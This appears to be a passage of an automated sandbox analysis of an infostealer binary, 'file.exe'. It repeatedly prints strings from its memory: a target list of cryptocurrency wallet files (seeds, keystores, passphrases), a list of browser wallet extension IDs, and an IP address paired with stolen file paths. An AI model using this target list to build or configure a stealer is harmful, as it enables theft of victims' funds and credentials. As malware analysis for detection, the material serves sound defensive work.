                        Source: file.exe, 00000000.00000002.2271135677.00000000008A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: file.exe, 00000000.00000002.2271135677.00000000008A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 77.91.77.81ineer\AppData\Roaming\\Exodus\\window-state.json7T
                        Source: file.exe, 00000000.00000002.2271135677.0000000000919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: MetaMask|djclckkglechooblngghdinmeemkbgci|1|0|0|MetaMask|ejbalbakoplchlghecdalmeeeajnimhm|1|0|0|MetaMask|nkbihfbeogaeaoehlefnkodbefgpgknn|1|0|0|TronLink|ibnejdfjmmkpcnlpebklmnkoeoihofec|1|0|0|Binance Wallet|fhbohimaelbohpjbbldcngcnapndodjp|1|0|0|Yoroi|ffnbelfdoeiohenkjibnmadjiehjhajb|1|0|0|Coinbase Wallet extension|hnfanknocfeofbddgcijnmhnfnkdnaad|1|0|1|Guarda|hpglfhgfnhbgpjdenjgmdgoeiappafln|1|0|0|Jaxx Liberty|cjelfplplebdjjenllpjcblmjkfcffne|1|0|0|iWallet|kncchdigobghenbbaddojjnnaogfppfj|1|0|0|MEW CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm|1|0|0|GuildWallet|nanjmdknhkinifnkgdcggcfnhdaammmj|1|0|0|Ronin Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec|1|0|0|NeoLine|cphhlgmgameodnhkjdmkpanlelnlohao|1|0|0|CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk|1|0|0|Liquality Wallet|kpfopkelmapcoipemfendmdcghnegimn|1|0|0|Terra Station Wallet|aiifbnbfobpmeekipheeijimdpnlpgpp|1|0|0|Keplr|dmkamcknogkgcdfhhbddcghachkejeap|1|0|0|Sollet|fhmfendgdocmcbmfikdcogofphimnkno|1|0|0|Auro Wallet(Mina Protocol)|cnmamaachppnkjgnildpdmkaakejnhae|1|0|0|Polymesh Wallet|jojhfeoedkpkglbfimdfabpdfjaoolaf|1|0|0|ICONex|flpiciilemghbmfalicajoolhkkenfel|1|0|0|Coin98 Wallet|aeachknmefphepccionboohckonoeemg|1|0|0|EVER Wallet|cgeeodpfagjceefieflmdfphplkenlfk|1|0|0|KardiaChain Wallet|pdadjkfkgcafgbceimcpbkalnfnepbnk|1|0|0|Rabby|acmacodkjbdgmoleebolmdjonilkdbch|1|0|0|Phantom|bfnaelmomeimhlpmgjnjophhpkkoljpa|1|0|0|Brave Wallet|odbfpeeihdkbihmopkbjmoonfanlbfcl|1|0|0|Oxygen|fhilaheimglignddkjgofkcbgekhenbh|1|0|0|Pali Wallet|mgffkfbidihjpoaomajlbgchddlicgpn|1|0|0|BOLT X|aodkkagnadcbobfpggfnjeongemjbjca|1|0|0|XDEFI Wallet|hmeobnfnfcmdkdcmlblgagmfpfboieaf|1|0|0|Nami|lpfcbjknijpeeillifnkikgncikgfhdo|1|0|0|Maiar DeFi Wallet|dngmlblcodfobpdpecaadgfbcggfjfnm|1|0|0|Keeper Wallet|lpilbniiabackdjcionkobglmddfbcjo|1|0|0|Solflare Wallet|bhhhlbepdkbapadjdnnojkbgioiodbic|1|0|0|Cyano Wallet|dkdedlpgdmmkkfjabffeganieamfklkm|1|0|0|KHC|hcflpincpppdclinealmandijcmnkbgn|1|0|0|TezBox|mnfifefkajgofkcjkemidiaecocnkjeh|1|0|0|Temple|ookjlbkiijinhpmnjffcofjonbfbgaoc|1|0|0|Goby|jnkelfanjkeadonecabehalmbgpfodjm|1|0|0|Ronin Wallet|kjmoohlgokccodicjjfebfomlbljgfhk|1|0|0|Byone|nlgbhdfgdhgbiamfdfmbikcdghidoadd|1|0|0|OneKey|jnmbobjmhlngoefaiojfljckilhhlhcj|1|0|0|DAppPlay|lodccjjbdhfakaekdiahmedfbieldgik|1|0|0|SteemKeychain|jhgnbkkipaallpehbohjmkbjofjdmeid|1|0|0|Braavos Wallet|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|kkpllkodjeloidieedojogacfhpaihoh|1|1|1|OKX Wallet|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender Wallet|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|Eternl|kmhcihpebfmpgmihbkipmjlmmioameka|1|0|0|Pontem Aptos Wallet|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Petra Aptos Wallet|ejjladinnckdgjemekebdpeokbikhfci|1|0|0|Martian Aptos Wallet|efbglgofoippbgcjepnhiblaibcnclgk|1|0|0|Finnie|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra Wallet|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Trezor Password Manager|imloifkgjagghnncjkhggdhalmcnfklk|1|0|0|Authenticator|bhghoamapcdpbohphigoooaddinpkbai|1|0|0|
                        Source: file.exe, 00000000.00000002.2271135677.00000000008A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 77.91.77.81ineer\AppData\Roaming\\Exodus\\window-state.json7T
                        Source: file.exe, 00000000.00000002.2271135677.00000000008A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: file.exe, 00000000.00000002.2271135677.00000000008A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: file.exe, 00000000.00000002.2271135677.00000000008A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: file.exe, 00000000.00000002.2271135677.00000000008A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: file.exe, 00000000.00000002.2271135677.00000000008A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 77.91.77.81ineer\AppData\Roaming\\Exodus\\window-state.json7T
                        Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 77.91.77.81\user\AppData\Roaming\Binance\.finger-print.fp{T
                        Source: file.exe, 00000000.00000002.2271135677.00000000008A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: file.exe, 00000000.00000002.2271135677.00000000008A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
